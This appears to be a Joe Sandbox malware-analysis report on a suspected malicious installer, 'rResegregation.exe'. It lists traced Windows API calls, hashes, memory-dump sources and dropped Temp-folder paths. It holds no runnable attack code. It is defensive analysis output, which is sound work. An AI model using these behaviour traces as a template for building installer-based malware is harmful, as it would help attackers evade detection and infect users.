                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: ShowWindow
                                                                  • String ID:
                                                                  • API String ID: 1268545403-0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(?,?,?,00403156,00000009), ref: 004060B7
                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 004060D2
                                                                    • Part of subcall function 00406037: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040604E
                                                                    • Part of subcall function 00406037: wsprintfA.USER32 ref: 00406087
                                                                    • Part of subcall function 00406037: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 0040609B
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                  • String ID:
                                                                  • API String ID: 2547128583-0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • GetFileAttributesA.KERNELBASE(00000003,00402CA6,C:\Users\user\Desktop\rResegregation.exe,80000000,00000003), ref: 00405983
                                                                  • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004059A5
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: File$AttributesCreate
                                                                  • String ID:
                                                                  • API String ID: 415043291-0
                                                                  • Opcode ID: 8635a13517db9147ca88e6c1994c1e63e85e115acab2f3846d9047911b568965
                                                                  • Instruction ID: 2848333a8a5b20597e43067d17cc290ce391feab13c7f73248cb22e1b8f9cacf
                                                                  • Opcode Fuzzy Hash: 8635a13517db9147ca88e6c1994c1e63e85e115acab2f3846d9047911b568965
                                                                  • Instruction Fuzzy Hash: 5CD09E31658301AFEF098F20DD16F2EBAA2EB84B01F10962CBA82950E0D6755C159B26
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • CreateDirectoryA.KERNELBASE(?,00000000,004030DF,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032DC), ref: 0040546E
                                                                  • GetLastError.KERNEL32 ref: 0040547C
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: CreateDirectoryErrorLast
                                                                  • String ID:
                                                                  • API String ID: 1375471231-0
                                                                  • Opcode ID: 5a69f4d8b5a7b583b3b8a13bd9b089cb74a3312a80339e25d7f83e3ab18a8421
                                                                  • Instruction ID: c55d8aa437131a95a01de78b0052dcd3d9cc3f447ee629d771dafcce0f52932c
                                                                  • Opcode Fuzzy Hash: 5a69f4d8b5a7b583b3b8a13bd9b089cb74a3312a80339e25d7f83e3ab18a8421
                                                                  • Instruction Fuzzy Hash: F5C04C30719601EAD6205B609E08B5B7D54AB54742F1045756546E10F0D6749451D92E
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: wsprintf
                                                                  • String ID:
                                                                  • API String ID: 2111968516-0
                                                                  • Opcode ID: 2b3f0152387d06df6eaf096f135fad1e6c25d68e51a67a505a4e16ce5121cf03
                                                                  • Instruction ID: 2ad6ade0dd87bb00519d913a8aa863536615c58d60cd2f1651ee4e1b5922b607
                                                                  • Opcode Fuzzy Hash: 2b3f0152387d06df6eaf096f135fad1e6c25d68e51a67a505a4e16ce5121cf03
                                                                  • Instruction Fuzzy Hash: D321DB70C04295BEDF318B584A985AF7B749B11314F1484BBE891B62D1C1BD8A85EB1D
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • SetFilePointer.KERNELBASE(00000000,?,00000000,00000002,?,?), ref: 00402630
                                                                    • Part of subcall function 00405C6A: wsprintfA.USER32 ref: 00405C77
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: FilePointerwsprintf
                                                                  • String ID:
                                                                  • API String ID: 327478801-0
                                                                  • Opcode ID: 605c8d6a649ef785eb1d6a94470a00a99215b591ffdd9e56fcea621c1e02c6b1
                                                                  • Instruction ID: 8aac78d75a064c4630454a8a93e19dff4664e4603579630d9101515f905a40da
                                                                  • Opcode Fuzzy Hash: 605c8d6a649ef785eb1d6a94470a00a99215b591ffdd9e56fcea621c1e02c6b1
                                                                  • Instruction Fuzzy Hash: 56E01A76A05640AAE701B7A5AE89CBE636ADB50318B20853BF601B00C1C6BD89059A3E
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 004022BC
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: PrivateProfileStringWrite
                                                                  • String ID:
                                                                  • API String ID: 390214022-0
                                                                  • Opcode ID: b9d7ae82dfceeebafb3c3a0508530cee58bb4de42ef2dd8ecfa1f3aabca50655
                                                                  • Instruction ID: ed5e863b5af70a22674a87f6432e4eb84017b1e79b4e81bbc09640d5f5368664
                                                                  • Opcode Fuzzy Hash: b9d7ae82dfceeebafb3c3a0508530cee58bb4de42ef2dd8ecfa1f3aabca50655
                                                                  • Instruction Fuzzy Hash: 8AE04F31B001746FDB217AF14E8EE7F11989B84348B64417EF601B62C3DDBC4D434AA9
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • RegOpenKeyExA.KERNELBASE(00000000,0000057B,00000000,00000022,00000000,?,?,?,00402314,00000002), ref: 00402B6C
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: Open
                                                                  • String ID:
                                                                  • API String ID: 71445658-0
                                                                  • Opcode ID: eded891075ee9d68bdfa7caca34f4ecd2b61e9434e1da65918f8acfe225afcc1
                                                                  • Instruction ID: f02d1f32d416435064830634415e16150983832f9e15cf27d1a8645227483e3a
                                                                  • Opcode Fuzzy Hash: eded891075ee9d68bdfa7caca34f4ecd2b61e9434e1da65918f8acfe225afcc1
                                                                  • Instruction Fuzzy Hash: 6EE0E676250108BFD700DFA9DD47FD577ECE758745F008421B609D7095C774E5508B69
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403057,00000000,007890F8,000000FF,007890F8,000000FF,000000FF,00000004,00000000), ref: 00405A3A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: FileWrite
                                                                  • String ID:
                                                                  • API String ID: 3934441357-0
                                                                  • Opcode ID: d04482319dc3028e4ce08f739f1cf32aeeec85f3b87b0f01a1fec36d148a5575
                                                                  • Instruction ID: 202e9d0092b88ed1e300126467a6d0629c49e9ab1c26cc5f9aac99f6baf52130
                                                                  • Opcode Fuzzy Hash: d04482319dc3028e4ce08f739f1cf32aeeec85f3b87b0f01a1fec36d148a5575
                                                                  • Instruction Fuzzy Hash: FFE0EC3261425AAFDF10AEA59C44EEB7B6CFB05360F008533F915E2550D231E921DFA9
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004030A1,00000000,00000000,00402EEE,000000FF,00000004,00000000,00000000,00000000), ref: 00405A0B
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: FileRead
                                                                  • String ID:
                                                                  • API String ID: 2738559852-0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • VirtualProtect.KERNELBASE(1000404C,00000004,00000040,1000403C), ref: 10002729
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28770977477.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_10000000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: ProtectVirtual
                                                                  • String ID:
                                                                  • API String ID: 544645111-0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • GetPrivateProfileStringA.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 004022FA
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: PrivateProfileString
                                                                  • String ID:
                                                                  • API String ID: 1096422788-0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • SendMessageA.USER32(000103C0,00000000,00000000,00000000), ref: 00403F4F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend
                                                                  • String ID:
                                                                  • API String ID: 3850602802-0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • SendMessageA.USER32(00000028,?,00000001,00403D57), ref: 00403F34
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend
                                                                  • String ID:
                                                                  • API String ID: 3850602802-0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E2D,00032BE4), ref: 004030B2
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: FilePointer
                                                                  • String ID:
                                                                  • API String ID: 973152223-0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • KiUserCallbackDispatcher.NTDLL(?,00403CF0), ref: 00403F1D
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: CallbackDispatcherUser
                                                                  • String ID:
                                                                  • API String ID: 2492992576-0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • CharNextA.USER32(?,004031D7,"C:\Users\user\Desktop\rResegregation.exe",00000020), ref: 004057B6
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: CharNext
                                                                  • String ID:
                                                                  • API String ID: 3213498283-0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • GetDlgItem.USER32(?,000003F9), ref: 004048BA
                                                                  • GetDlgItem.USER32(?,00000408), ref: 004048C5
                                                                  • GlobalAlloc.KERNEL32(00000040,00000003), ref: 0040490F
                                                                  • LoadBitmapA.USER32(0000006E), ref: 00404922
                                                                  • SetWindowLongA.USER32(?,000000FC,00404E99), ref: 0040493B
                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 0040494F
                                                                  • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404961
                                                                  • SendMessageA.USER32(?,00001109,00000002), ref: 00404977
                                                                  • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404983
                                                                  • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404995
                                                                  • DeleteObject.GDI32(00000000), ref: 00404998
                                                                  • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 004049C3
                                                                  • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 004049CF
                                                                  • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404A64
                                                                  • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404A8F
                                                                  • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404AA3
                                                                  • GetWindowLongA.USER32(?,000000F0), ref: 00404AD2
                                                                  • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404AE0
                                                                  • ShowWindow.USER32(?,00000005), ref: 00404AF1
                                                                  • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404BEE
                                                                  • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404C53
                                                                  • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404C68
                                                                  • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404C8C
                                                                  • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404CAC
                                                                  • ImageList_Destroy.COMCTL32(?), ref: 00404CC1
                                                                  • GlobalFree.KERNEL32(?), ref: 00404CD1
                                                                  • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404D4A
                                                                  • SendMessageA.USER32(?,00001102,?,?), ref: 00404DF3
                                                                  • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404E02
                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00404E22
                                                                  • ShowWindow.USER32(?,00000000), ref: 00404E70
                                                                  • GetDlgItem.USER32(?,000003FE), ref: 00404E7B
                                                                  • ShowWindow.USER32(00000000), ref: 00404E82
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                  • String ID: $M$N
                                                                  • API String ID: 1638840714-813528018
                                                                  • Opcode ID: f2b7aa1e677df4c75b347a9eeeab381988bf86340d3158c8b8f5eab98d7d410a
                                                                  • Instruction ID: 76d2e208bb82396193868b8099a6daa05122b73eb358a4a137ee08f8801950ae
                                                                  • Opcode Fuzzy Hash: f2b7aa1e677df4c75b347a9eeeab381988bf86340d3158c8b8f5eab98d7d410a
                                                                  • Instruction Fuzzy Hash: F1026CB0900209AFEB14DF94DD85AAE7BB9FB84314F10813AF610BA2E1D7789D51CF58
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • GetDlgItem.USER32(?,000003FB), ref: 0040437E
                                                                  • SetWindowTextA.USER32(00000000,?), ref: 004043A8
                                                                  • SHBrowseForFolderA.SHELL32(?,0079D918,?), ref: 00404459
                                                                  • CoTaskMemFree.OLE32(00000000), ref: 00404464
                                                                  • lstrcmpiA.KERNEL32(Call,0079E540), ref: 00404496
                                                                  • lstrcatA.KERNEL32(?,Call), ref: 004044A2
                                                                  • SetDlgItemTextA.USER32(?,000003FB,?), ref: 004044B4
                                                                    • Part of subcall function 004054E6: GetDlgItemTextA.USER32(?,?,00000400,004044EB), ref: 004054F9
                                                                    • Part of subcall function 00405F77: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\rResegregation.exe",76483410,C:\Users\user\AppData\Local\Temp\,00000000,004030C7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032DC), ref: 00405FCF
                                                                    • Part of subcall function 00405F77: CharNextA.USER32(?,?,?,00000000), ref: 00405FDC
                                                                    • Part of subcall function 00405F77: CharNextA.USER32(?,"C:\Users\user\Desktop\rResegregation.exe",76483410,C:\Users\user\AppData\Local\Temp\,00000000,004030C7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032DC), ref: 00405FE1
                                                                    • Part of subcall function 00405F77: CharPrevA.USER32(?,?,76483410,C:\Users\user\AppData\Local\Temp\,00000000,004030C7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032DC), ref: 00405FF1
                                                                  • GetDiskFreeSpaceA.KERNEL32(0079D510,?,?,0000040F,?,0079D510,0079D510,?,00000001,0079D510,?,?,000003FB,?), ref: 00404572
                                                                  • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040458D
                                                                    • Part of subcall function 004046E6: lstrlenA.KERNEL32(0079E540,0079E540,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404601,000000DF,00000000,00000400,?), ref: 00404784
                                                                    • Part of subcall function 004046E6: wsprintfA.USER32 ref: 0040478C
                                                                    • Part of subcall function 004046E6: SetDlgItemTextA.USER32(?,0079E540), ref: 0040479F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                  • String ID: @y$A$C:\Users\user\AppData\Local\Temp\bandidos\Clearingkontoen\skrivetjet$Call
                                                                  • API String ID: 2624150263-2851418435
                                                                  • Opcode ID: 4367221acb27fbafda39f30d3b729b6150a881a92f1b2ab0f00bcccaea6e9431
                                                                  • Instruction ID: dc70ebfb722856edf20ca9fe518129045a13840cef36c67e0ec65d3b8ea71268
                                                                  • Opcode Fuzzy Hash: 4367221acb27fbafda39f30d3b729b6150a881a92f1b2ab0f00bcccaea6e9431
                                                                  • Instruction Fuzzy Hash: 69A182B1900208ABDB11EFA5DC45BAF77B8EF85314F10843BF601B62D1D77C9A418B69
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                    • Part of subcall function 10001215: GlobalAlloc.KERNEL32(00000040,10001233,?,100012CF,-1000404B,100011AB,-000000A0), ref: 1000121D
                                                                  • GlobalAlloc.KERNEL32(00000040,000014A4), ref: 10001B67
                                                                  • lstrcpyA.KERNEL32(00000008,?), ref: 10001BAF
                                                                  • lstrcpyA.KERNEL32(00000408,?), ref: 10001BB9
                                                                  • GlobalFree.KERNEL32(00000000), ref: 10001BCC
                                                                  • GlobalFree.KERNEL32(?), ref: 10001CC4
                                                                  • GlobalFree.KERNEL32(?), ref: 10001CC9
                                                                  • GlobalFree.KERNEL32(?), ref: 10001CCE
                                                                  • GlobalFree.KERNEL32(00000000), ref: 10001E76
                                                                  • lstrcpyA.KERNEL32(?,?), ref: 10001FCA
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28770977477.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                  • Associated: 00000000.00000002.28770951337.0000000010000000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000000.00000002.28771003199.0000000010003000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000000.00000002.28771028957.0000000010005000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_10000000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: Global$Free$lstrcpy$Alloc
                                                                  • String ID:
                                                                  • API String ID: 4227406936-0
                                                                  • Opcode ID: 108015169a1f9511be137f3b76d088d284be53ebd3be1ec406ce9b744c5ee79e
                                                                  • Instruction ID: 780798ea066e4ece118e8e5fed0bf18c828ec290136deaf2e43fc5d0554b8685
                                                                  • Opcode Fuzzy Hash: 108015169a1f9511be137f3b76d088d284be53ebd3be1ec406ce9b744c5ee79e
                                                                  • Instruction Fuzzy Hash: 17129971D0424ADFFB20CFA4C8847EEBBF4FB043C4F61852AD5A1A2199DB749A81CB51
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • CoCreateInstance.OLE32(00407408,?,00000001,004073F8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020DD
                                                                  • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,004073F8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402189
                                                                  Strings
                                                                  • C:\Users\user\AppData\Local\Temp\bandidos\Clearingkontoen\skrivetjet\brummedes\janthinidae\Uhyre, xrefs: 0040211D
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharCreateInstanceMultiWide
                                                                  • String ID: C:\Users\user\AppData\Local\Temp\bandidos\Clearingkontoen\skrivetjet\brummedes\janthinidae\Uhyre
                                                                  • API String ID: 123533781-2936765130
                                                                  • Opcode ID: 242605dd3021b9dd3d625f3e37deec10c9ff713f063c09ff5835f8ca8ab74a70
                                                                  • Instruction ID: 14d4926e91d078e82bebccc5f6ab74bc99395aff19d04a9878b07c190defc42e
                                                                  • Opcode Fuzzy Hash: 242605dd3021b9dd3d625f3e37deec10c9ff713f063c09ff5835f8ca8ab74a70
                                                                  • Instruction Fuzzy Hash: 9D513871A00208BFDB10DFA4C988A9DBBB5FF48318F20856AF515EB2D1DB799941CB54
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402697
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: FileFindFirst
                                                                  • String ID:
                                                                  • API String ID: 1974802433-0
                                                                  • Opcode ID: caea3b9b5083208269277406012316af798426384357970767d8f37829e133fd
                                                                  • Instruction ID: 693c9160ce4d260d62fecbf2f45a0834f3a8ccba4a644e55fc62545b2e120305
                                                                  • Opcode Fuzzy Hash: caea3b9b5083208269277406012316af798426384357970767d8f37829e133fd
                                                                  • Instruction Fuzzy Hash: F9F0A0335081509FE701E7B49949AEEB778EF61324F60457BF241B21C1D7B84A84AA3A
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 004040C5
                                                                  • GetDlgItem.USER32(00000000,000003E8), ref: 004040D9
                                                                  • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 004040F7
                                                                  • GetSysColor.USER32(?), ref: 00404108
                                                                  • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00404117
                                                                  • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404126
                                                                  • lstrlenA.KERNEL32(?), ref: 00404129
                                                                  • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00404138
                                                                  • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 0040414D
                                                                  • GetDlgItem.USER32(?,0000040A), ref: 004041AF
                                                                  • SendMessageA.USER32(00000000), ref: 004041B2
                                                                  • GetDlgItem.USER32(?,000003E8), ref: 004041DD
                                                                  • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 0040421D
                                                                  • LoadCursorA.USER32(00000000,00007F02), ref: 0040422C
                                                                  • SetCursor.USER32(00000000), ref: 00404235
                                                                  • ShellExecuteA.SHELL32(0000070B,open,007A0EE0,00000000,00000000,00000001), ref: 00404248
                                                                  • LoadCursorA.USER32(00000000,00007F00), ref: 00404255
                                                                  • SetCursor.USER32(00000000), ref: 00404258
                                                                  • SendMessageA.USER32(00000111,00000001,00000000), ref: 00404284
                                                                  • SendMessageA.USER32(00000010,00000000,00000000), ref: 00404298
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                  • String ID: Call$N$open
                                                                  • API String ID: 3615053054-2563687911
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                  • BeginPaint.USER32(?,?), ref: 00401047
                                                                  • GetClientRect.USER32(?,?), ref: 0040105B
                                                                  • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                  • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                  • DeleteObject.GDI32(?), ref: 004010ED
                                                                  • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                  • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                  • SetTextColor.GDI32(00000000,?), ref: 00401130
                                                                  • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                  • DrawTextA.USER32(00000000,Bortdmmer Setup,000000FF,00000010,00000820), ref: 00401156
                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                  • DeleteObject.GDI32(?), ref: 00401165
                                                                  • EndPaint.USER32(?,?), ref: 0040116E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                  • String ID: Bortdmmer Setup$F
                                                                  • API String ID: 941294808-2032987969
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • lstrcpyA.KERNEL32(007A02D0,NUL,?,00000000,?,00000000,00405BE8,?,?), ref: 00405A64
                                                                  • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,00405BE8,?,?), ref: 00405A88
                                                                  • GetShortPathNameA.KERNEL32(?,007A02D0,00000400), ref: 00405A91
                                                                    • Part of subcall function 004058E4: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B41,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004058F4
                                                                    • Part of subcall function 004058E4: lstrlenA.KERNEL32(00000000,?,00000000,00405B41,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405926
                                                                  • GetShortPathNameA.KERNEL32(007A06D0,007A06D0,00000400), ref: 00405AAE
                                                                  • wsprintfA.USER32 ref: 00405ACC
